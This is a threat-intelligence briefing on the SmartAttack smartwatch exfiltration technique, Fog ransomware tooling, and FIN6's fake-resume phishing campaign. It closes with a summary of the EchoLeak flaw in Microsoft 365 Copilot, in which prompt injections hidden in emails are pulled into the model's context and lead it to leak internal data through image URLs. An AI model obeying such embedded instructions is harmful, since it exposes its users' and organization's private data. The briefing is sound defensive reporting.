Malware Activity
From Wearable Devices to Sophisticated Ransomware Tactics
Recent cybersecurity research reveals a troubling evolution in attack methods, highlighting both the ingenuity and danger posed by modern threat actors. The "SmartAttack" technique demonstrates how compromised smartwatches can covertly extract sensitive data from air-gapped, high-security systems via Bluetooth. Exploiting seemingly benign consumer devices to bypass traditional defenses. Simultaneously, ransomware operators are adopting advanced, stealthy tactics by leveraging legitimate open-source tools and employee monitoring software like Syteca, along with exploiting vulnerabilities in VPNs and backup systems. Their use of familiar utilities such as PsExec, Impacket, and the GC2 backdoor illustrates a strategic shift toward blending malicious activity with legitimate processes to evade detection. These developments underscore the critical need for organizations to rethink security protocols, especially concerning interconnected devices and the use of legitimate software, as cybercriminals continue to escalate their sophistication and reach. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
- BleepingComputer: SmartAttack Uses Smartwatches To Steal Data From Air Gapped Systems article
- BleepingComputer: Fog Ransomware Attack Uses Unusual Mix of Legitimate and Open Source Tools article
Threat Actor Activity
FIN6 Targeting Job Recruiters on LinkedIn with Malware-infected Fake Resumes
The cybercriminal group FIN6, also known as Skeleton Spider, has adopted a new tactic by posing as job seekers on platforms like LinkedIn and Indeed to distribute malware through fake resumes. This marks a shift from their traditional focus on stealing payment card data from point-of-sale (POS) systems in the hospitality and retail sectors. In their latest campaign, FIN6 engages with recruiters, builds rapport, and then sends phishing emails that lead to the deployment of the MoreEggs backdoor malware. The phishing emails are crafted to bypass security filters by requiring recipients to manually type URLs into their browsers, which direct them to landing pages mimicking personal resume portfolios. These pages, hosted on trusted cloud infrastructure such as AWS, use traffic filtering and CAPTCHA to ensure only human recruiters are targeted. Once verified, the site delivers a malicious ZIP file containing the MoreEggs malware, which is sold as malware-as-a-service by another group known as Venom Spider. MoreEggs facilitates credential theft, system access, and subsequent ransomware attacks. FIN6's use of AWS infrastructure and GoDaddy's domain privacy services adds layers of obfuscation, making it difficult for investigators to trace and dismantle their operations. The group has been operational since at least 2012 and has previously used Magecart JavaScript skimmers to target e-commerce sites. The campaign highlights the effectiveness of low-complexity phishing attacks when combined with advanced evasion techniques and reputable cloud services. AWS has stated its commitment to disabling prohibited content and encourages the security community to report any suspected abuse.
Vulnerabilities
EchoLeak and Zero-Click AI Exploits: Unveiling the Hidden Threats in Microsoft Copilot and LLM Architectures
EchoLeak is a newly discovered zero-click AI vulnerability in Microsoft 365 Copilot that enables attackers to silently exfiltrate sensitive internal data without user interaction by exploiting a Large Language Model (LLM) Scope Violation. Identified by Aim Labs/Aim Security and patched server-side by Microsoft in May 2025, the flaw, tracked as CVE-2025-32711 (CVSS 9.3/10), leverages prompt injections embedded in seemingly benign emails that bypass security filters and are later retrieved into the AI's context by the Retrieval-Augmented Generation (RAG) engine. This causes the LLM to extract privileged information and leak it via markdown-formatted image URLs or trusted Microsoft Teams and SharePoint links. Though not exploited in the wild, EchoLeak exemplifies a new class of vulnerabilities that weaponize helpful AI features into silent attack vectors. The attackโs automation potential and ability to operate without user behavior make it particularly dangerous in enterprise environments. The broader article also explores related threats to the Model Context Protocol (MCP), including Full-Schema Poisoning (FSP), advanced tool poisoning attacks (ATPA), and DNS rebinding techniques targeting localhost MCP servers via deprecated Server-Sent Events (SSE). These findings expose critical architectural blind spots in LLM-integrated systems, emphasizing the urgent need for improved prompt filtering, input scoping, output sanitization, and strict trust boundary enforcement in AI-agent design and infrastructure.
๐ง Never Miss a Briefing
Stay informed and secure. Subscribe to Ankura's Cyber Flash Update, a bi-weekly briefing curated by our top cybersecurity experts. Receive timely insights on emerging threats, vulnerabilities and malicious actors to keep your systems secure.
Join the Cyber Flash Update community today.

ยฉ Copyright 2025. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.